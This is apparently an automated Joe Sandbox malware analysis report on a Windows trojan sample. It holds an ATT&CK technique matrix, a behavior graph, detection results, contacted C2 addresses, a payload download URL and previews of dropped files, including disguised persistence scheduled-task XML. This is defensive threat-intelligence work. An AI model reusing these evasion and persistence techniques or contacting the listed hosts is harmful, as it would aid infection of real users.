                      Obfuscated Files or Information                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares121
                      Input Capture                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook223
                      Process Injection                      		1
                      Software Packing                      		NTDS36
                      System Information Discovery                      		Distributed Component Object Model2
                      Clipboard Data                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Query Registry                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials131
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Modify Registry                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                      Virtualization/Sandbox Evasion                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadow11
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron223
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Indicator Removal                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585743 Sample: leBwnyHIgx.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 59 xrpy.oss-ap-southeast-1.aliyuncs.com 2->59 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 7 other signatures 2->71 9 leBwnyHIgx.exe 19 2->9         started        signatures3 process4 dnsIp5 61 154.82.85.107, 15091, 15092, 18852 ROOTNETWORKSUS Seychelles 9->61 63 xrpy.oss-ap-southeast-1.aliyuncs.com 47.79.48.230, 443, 49732 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 9->63 51 C:\Users\user\Downloads\wpsv.5.6.3.exe, PE32 9->51 dropped 53 C:\Users\user\AppData\...\leBwnyHIgx.exe, PE32 9->53 dropped 55 C:\Users\...\leBwnyHIgx.exe:Zone.Identifier, ASCII 9->55 dropped 57 C:\Users\user\AppData\...\wpsv.5.6.3[1].exe, PE32 9->57 dropped 75 Adds a directory exclusion to Windows Defender 9->75 14 leBwnyHIgx.exe 3 2 9->14         started        17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        21 cmd.exe 1 9->21         started        file6 signatures7 process8 signatures9 79 Multi AV Scanner detection for dropped file 14->79 81 Contains functionality to inject threads in other processes 14->81 83 Contains functionality to capture and log keystrokes 14->83 85 Contains functionality to inject code into remote processes 14->85 23 cmd.exe 14->23         started        25 cmd.exe 14->25         started        87 Bypasses PowerShell execution policy 17->87 89 Adds a directory exclusion to Windows Defender 17->89 27 powershell.exe 22 17->27         started        30 conhost.exe 17->30         started        32 powershell.exe 1 22 19->32         started        34 conhost.exe 19->34         started        36 powershell.exe 39 21->36         started        38 conhost.exe 21->38         started        process10 signatures11 40 powershell.exe 23->40         started        43 conhost.exe 23->43         started        45 conhost.exe 25->45         started        47 powershell.exe 25->47         started        77 Loading BitLocker PowerShell Module 27->77 49 WmiPrvSE.exe 27->49         started        process12 signatures13 73 Loading BitLocker PowerShell Module 40->73

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      leBwnyHIgx.exe29%VirustotalBrowse
                      leBwnyHIgx.exe24%ReversingLabs

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exe4%ReversingLabs
                      C:\Users\user\AppData\Roaming\leBwnyHIgx.exe24%ReversingLabs
                      C:\Users\user\Downloads\wpsv.5.6.3.exe4%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exe0%Avira URL Cloudsafe
                      http://crl.m76u8s0%Avira URL Cloudsafe
                      https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exex0%Avira URL Cloudsafe
                      http://crl.microsof0%Avira URL Cloudsafe
                      154.82.85.107:150920%Avira URL Cloudsafe
                      http://schemas.microsoft.co0%Avira URL Cloudsafe
                      https://xrpy.oss-ap-southeast-1.aliyuncs.com/0%Avira URL Cloudsafe
                      https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exec0%Avira URL Cloudsafe
                      154.82.85.107:150910%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      xrpy.oss-ap-southeast-1.aliyuncs.com
                      		47.79.48.230
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        154.82.85.107:15091true
                        • Avira URL Cloud: safe
                        		unknown
                        154.82.85.107:15092true
                        • Avira URL Cloud: safe
                        		unknown
                        https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exefalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.innosetup.com/leBwnyHIgx.exe, leBwnyHIgx.exe.0.drfalse
                          		high
                          http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://code.visualstudio.com/0leBwnyHIgx.exe, leBwnyHIgx.exe.0.drfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.microsoftpowershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1780310479.00000000028CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://go.micropowershell.exe, 00000003.00000002.1704205290.0000000005311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.000000000581D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exexleBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.mipowershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.m76u8sleBwnyHIgx.exe, 00000000.00000002.2078649644.0000000003906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.micropowershell.exe, 00000003.00000002.1703418182.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2029415416.000000000701B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.microsofpowershell.exe, 00000014.00000002.1996269596.0000000002971000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://xrpy.oss-ap-southeast-1.aliyuncs.com/leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.remobjects.com/psleBwnyHIgx.exe, leBwnyHIgx.exe.0.drfalse
                                                            		high
                                                            https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exeXleBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.microsoft.copowershell.exe, 00000013.00000002.2028829277.0000000006FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://aka.ms/pscore6lBtqpowershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.execleBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  47.79.48.230
                                                                  		xrpy.oss-ap-southeast-1.aliyuncs.comUnited States
                                                                  		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                  154.82.85.107
                                                                  		unknownSeychelles
                                                                  		32708ROOTNETWORKSUStrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1585743
                                                                  Start date and time:2025-01-08 07:14:06 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 10m 39s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:22
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:leBwnyHIgx.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@29/27@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 33.3%
                                                                  HCA Information:
                                                                  • Successful, ratio: 92%
                                                                  • Number of executed functions: 210
                                                                  • Number of non-executed functions: 207
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.253.45
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 2032 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 5444 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6100 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6616 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  01:14:59API Interceptor51x Sleep call for process: powershell.exe modified
                                                                  01:15:29API Interceptor3197138x Sleep call for process: leBwnyHIgx.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  VODAFONE-TRANSIT-ASVodafoneNZLtdNZmiori.arm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 47.78.226.190
                                                                  miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                  • 118.95.51.101
                                                                  z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 121.74.70.74
                                                                  armv4l.elfGet hashmaliciousUnknownBrowse
                                                                  • 118.95.125.90
                                                                  HGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
                                                                  • 47.79.48.211
                                                                  1731043030539.exeGet hashmaliciousReflectiveLoaderBrowse
                                                                  • 47.76.199.218
                                                                  armv7l.elfGet hashmaliciousUnknownBrowse
                                                                  • 47.78.236.90
                                                                  botx.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 49.226.28.57
                                                                  zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                  • 47.79.48.211
                                                                  QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                  • 47.79.48.211
                                                                  ROOTNETWORKSUS6f0slJzOrF.exeGet hashmaliciousGhostRatBrowse
                                                                  • 154.82.85.79
                                                                  m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 156.236.225.1
                                                                  Installer eSPT Masa PPh versi 2.0#U007e26022009.exeGet hashmaliciousBlackMoonBrowse
                                                                  • 154.82.113.139
                                                                  Installer eSPT Masa PPh versi 2.0#U007e26022009.exeGet hashmaliciousBlackMoonBrowse
                                                                  • 154.82.113.139
                                                                  MicrosoftEdgeUpdateSetup.exeGet hashmaliciousUnknownBrowse
                                                                  • 154.82.68.34
                                                                  nshkarm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 154.94.148.181
                                                                  x86.elfGet hashmaliciousUnknownBrowse
                                                                  • 154.82.151.143
                                                                  bot.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.145.246.125
                                                                  nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 156.236.225.1
                                                                  akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                  • 154.94.130.206

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  37f463bf4616ecd445d4a1937da06e19c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 47.79.48.230
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 47.79.48.230
                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                  • 47.79.48.230
                                                                  1.exeGet hashmaliciousLummaC, XRedBrowse
                                                                  • 47.79.48.230
                                                                  9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                  • 47.79.48.230
                                                                  23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                                  • 47.79.48.230
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 47.79.48.230
                                                                  H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                  • 47.79.48.230
                                                                  287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                                  • 47.79.48.230

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\Downloads\wpsv.5.6.3.exeWPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msiGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                    fNlAH8RgLk.exeGet hashmaliciousUnknownBrowse
                                                                      fNlAH8RgLk.exeGet hashmaliciousUnknownBrowse
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exeWPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msiGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                          fNlAH8RgLk.exeGet hashmaliciousUnknownBrowse
                                                                            fNlAH8RgLk.exeGet hashmaliciousUnknownBrowse

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                              Category:dropped
                                                                              Size (bytes):3027728
                                                                              Entropy (8bit):7.856503406318228
                                                                              Encrypted:false
                                                                              SSDEEP:49152:sejRVM654Suz/Debm7vpElDBc4uN+C+LHseGi1pm2PfLwUA0EUEiXDSWqf16yag5:sejRVMDhe6yH1ugfHseGKtPDw50E1iTe
                                                                              MD5:B52BA2B99108C496389AE5BB81FA6537
                                                                              SHA1:9073D8C4A1968BE24357862015519F2AFECD833A
                                                                              SHA-256:C6AC7D9ADD40B913112B265D4F366D9EF80BBD711049DB085FC750FCAD4E14D8
                                                                              SHA-512:6637506EE80D359E729E0011B97E8D827E14356393193247F502B7FCFBBCA249DC045B8ACFE4B31CE462468F421DC5D9A4E31183BEDB66C45A9AA43C01F81397
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                              Joe Sandbox View:
                                                                              • Filename: WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi, Detection: malicious, Browse
                                                                              • Filename: fNlAH8RgLk.exe, Detection: malicious, Browse
                                                                              • Filename: fNlAH8RgLk.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......q...5...5...5...n.......n........a/.<......&....../...n...4...n...4..........n.......n...6...5... ...........5...V...............4...5...7.......4...Rich5...........PE..L.....dc..................*.......,..ZW...,..`W...@..........................0Z......s....@.................................T-Z......`W.T.............-..H....Z..............................\W......\W.....................$PD.@...................UPX0......,.............................UPX1......*...,...*.................@....rsrc........`W.......*.............@......................................................................................................................................................................................................................................................................................................................................3.08.UPX!....

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1510207563435464
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul3kXth:NllUU9
                                                                              MD5:019176F36446FB707E6BC4E6B2DC1872
                                                                              SHA1:BD4BC5E64D663A8CABB7B85DE200150A6EF161CE
                                                                              SHA-256:710409E2A9EFBB4094ACF266005C16DA382F7F8DCB135766A558419E23AD142F
                                                                              SHA-512:6673E319305C9BED1DBA99B8EBACBC148D75100811FB12E2D4C3D2865856D128B0AF8AAFEC5E0F6F258042E7D2EF9519D668D17E87F25318011D7FB0C4355A98
                                                                              Malicious:false
                                                                              Preview:@...e.................................f..............@..........

                                                                              C:\Users\user\AppData\Local\PolicyManagement.xml

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1893
                                                                              Entropy (8bit):5.212287775015203
                                                                              Encrypted:false
                                                                              SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                              MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                              SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                              SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                              SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                                              C:\Users\user\AppData\Local\Temp\PolicyManagement.xml

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1743
                                                                              Entropy (8bit):5.172564010951281
                                                                              Encrypted:false
                                                                              SSDEEP:48:ck5XzDlybXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:75XzDlybGQhFdOFQOzBdKrKsTLXbV
                                                                              MD5:A16DD00D191DC2FC881634D7DEE2026C
                                                                              SHA1:53A373DC6DA7CA186695CCCB9BF3CFC205C45C58
                                                                              SHA-256:27CD089F35A3AB92614414C0788900BC64C637B2FC011858932F335C88FEF23D
                                                                              SHA-512:F430EB5753C428D3473485217865F9BC8C16804C211A2788E3B90D6F9CE499BF0842EB35A4519AD5223741348E4AB47F80A4F13004D5EE9B2CD0322B75E82264
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\.Net OneStart</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers />. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>.

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uhxolt4.3yp.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
